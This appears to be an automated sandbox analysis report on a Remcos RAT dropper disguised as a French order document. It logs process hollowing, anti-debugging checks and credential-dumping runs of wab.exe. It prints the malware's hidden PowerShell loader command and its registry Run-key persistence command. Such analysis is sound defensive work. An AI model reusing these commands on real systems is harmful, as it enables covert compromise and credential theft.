            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7432Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2299Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1968Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3212Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6900Thread sleep count: 1968 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 1968 delay: -5Jump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00405FE2 FindFirstFileA,FindClose,0_2_00405FE2
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: wab.exe, 00000007.00000002.3324148193.0000000009A19000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.3324148193.0000000009A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeAPI call chain: ExitProcess graph end nodegraph_0-3170
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeAPI call chain: ExitProcess graph end nodegraph_0-3328
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_05C4C53D Sleep,LdrInitializeThunk,NtProtectVirtualMemory,7_2_05C4C53D
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406009
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
            Sample uses process hollowing technique
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4160000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2ECFDECJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"Jump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$interlucent=get-content 'c:\users\user\appdata\local\salpetersyrefabrikkers\occupying\nonsynoptic168\unvolubly\langtrkkendes\pelletising.art';$sciography=$interlucent.substring(57898,3);.$sciography($interlucent)"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "emraud" /t reg_expand_sz /d "%skraastillinger% -windowstyle minimized $boplskommunens=(get-itemproperty -path 'hkcu:\somervillite\').efs;%skraastillinger% ($boplskommunens)"
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$interlucent=get-content 'c:\users\user\appdata\local\salpetersyrefabrikkers\occupying\nonsynoptic168\unvolubly\langtrkkendes\pelletising.art';$sciography=$interlucent.substring(57898,3);.$sciography($interlucent)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "emraud" /t reg_expand_sz /d "%skraastillinger% -windowstyle minimized $boplskommunens=(get-itemproperty -path 'hkcu:\somervillite\').efs;%skraastillinger% ($boplskommunens)"Jump to behavior
            Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles
            Source: wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles8
            Source: wab.exe, 00000007.00000002.3324378709.0000000009A77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2945584583.0000000009A76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00405D00 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D00

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2644, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2644, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		11
            Input Capture            		3
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API            		1
            Registry Run Keys / Startup Folder            		312
            Process Injection            		1
            Obfuscated Files or Information            		LSASS Memory14
            System Information Discovery            		Remote Desktop Protocol11
            Input Capture            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Shared Modules            		Logon Script (Windows)1
            Registry Run Keys / Startup Folder            		1
            Software Packing            		Security Account Manager111
            Security Software Discovery            		SMB/Windows Admin Shares1
            Clipboard Data            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts11
            Command and Scripting Interpreter            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts2
            PowerShell            		Network Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets41
            Virtualization/Sandbox Evasion            		SSHKeylogging213
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
